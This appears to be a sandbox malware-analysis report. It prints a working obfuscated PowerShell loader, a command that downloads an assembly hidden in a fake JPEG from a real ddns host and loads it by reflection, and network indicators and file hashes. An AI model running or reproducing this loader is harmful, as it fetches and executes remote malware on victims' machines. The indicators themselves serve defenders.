㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴aQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴ZwBl≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴TwBm≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Zg≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴r≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴dQBi≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴By≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴Ew≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴WwBT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴ZQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴XQ≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴RgBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBC≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQBk≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bb≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴eQBz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴ZQBt≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bg≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQBd≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴OgBM≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴EI≩ ⫻ ㏤ ≪ ㏴eQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YgBs≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BU≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴E8≩ ⫻ ㏤ ≪ ㏴LgBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBl≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴7≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bt≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BN≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴VgBB≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴bwBr≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴bwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴WwBd≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴B4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBC≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴UgBU≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴O≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴4≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴NQ≩ ⫻ ㏤ ≪ ㏴z≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lg≩ ⫻ ㏤ ≪ ㏴y≩ ⫻ ㏤ ≪ ㏴Dk≩ ⫻ ㏤ ≪ ㏴MQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴DM≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴x≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBS≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cwBh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\5r1u6emx.cmdline
| MD5 | 9149ec827cd7681c88efd4b1d2315e34 |
| SHA1 | d078e2f6ba001e5391b94b125ef7a6f5e47cd0af |
| SHA256 | fe713e51456f6b773309693867dbe93911a12e28c69e9602f0dd3b899850679b |
| SHA512 | 3b6c08647f3ff7b5abec3fe821754aeb1b447a8e032f10a14a25ffeceabafe414b54cf73608f836fbc15b7c8b22454f35b5e1165d145abd4d8f7218ca08856aa |
\??\c:\Users\Admin\AppData\Local\Temp\5r1u6emx.0.cs
| MD5 | d71dc34ff8dbecd13f179ed952a841d5 |
| SHA1 | 78c3b0d410495a39154fbd26663468d6e5de5768 |
| SHA256 | 19b4037d5d9fa1532eb40ab0f16ad5a5c96cb3d9d3ab27b3e4e82ea74f3cf175 |
| SHA512 | 2b6397a38038caa9b412460801b007615461db4f8e24a8896f17cad90bc5d50286682387cc524aee6c3a38172d9932a125aef07c5ebdcc406ef7203a577aa84f |
\??\c:\Users\Admin\AppData\Local\Temp\CSC64FA.tmp
| MD5 | fba916bb2fe5dc5676ce114565abeac2 |
| SHA1 | 4ad589abac6a1372946fbcf493b89ebe8530fa1e |
| SHA256 | b8fdf79a1f9127bf3678cced0629356cc9e2d5674b43fc29d67ca52bd8cf2861 |
| SHA512 | c6cd3320a1155d38f244d153e86d5f410ce6b8472edff4fefb3576bec025f16cfd7974b65eb2f2eaae53b97c099f2b83c66ecb5522eff02eabc2bb71e444f6cc |
C:\Users\Admin\AppData\Local\Temp\RES64FB.tmp
| MD5 | 9572f520a53a6b7588595c7dd2915656 |
| SHA1 | 522e3c29f5cd0b84944b9f02cb0743bd3ade0164 |
| SHA256 | 20cc38c440f070333a32a658ba502799c8555445c0426770729c80a839eb97ff |
| SHA512 | 2d9d41d8574af8db43f4c92ca3e76d6f1774568de0af0a22c85275a489a0ecaa0e8b25f7e62813552dea2c93e224abdf9de989d929ce028a5728bb7333eb191e |
C:\Users\Admin\AppData\Local\Temp\5r1u6emx.dll
| MD5 | 48894263a667952c4cf32d2f2654062f |
| SHA1 | 06bad01ffc362d5af42e2b2463c71a205976ad65 |
| SHA256 | a882eeb801d4994cc0a0883f8b0eeda106f9a6dc4e698f27c8e006a5a9f065db |
| SHA512 | 706a1bce4dc2c3a7cbc728adeae3958c2fad96f58c656f79becf3118632137303c72401a359b07e4e3936f04d34cf515d1b6b1b187937bab827f093390030279 |
C:\Users\Admin\AppData\Local\Temp\5r1u6emx.pdb
| MD5 | 83e629473ff298bc753832fad34fb69d |
| SHA1 | b7e4c1473cd1768ea274bc52ada9a6b3f57536e6 |
| SHA256 | f6ef23404b9dce74a2d4795531b0bcf4e5267f39647653de0e58d9dd43f8ecbd |
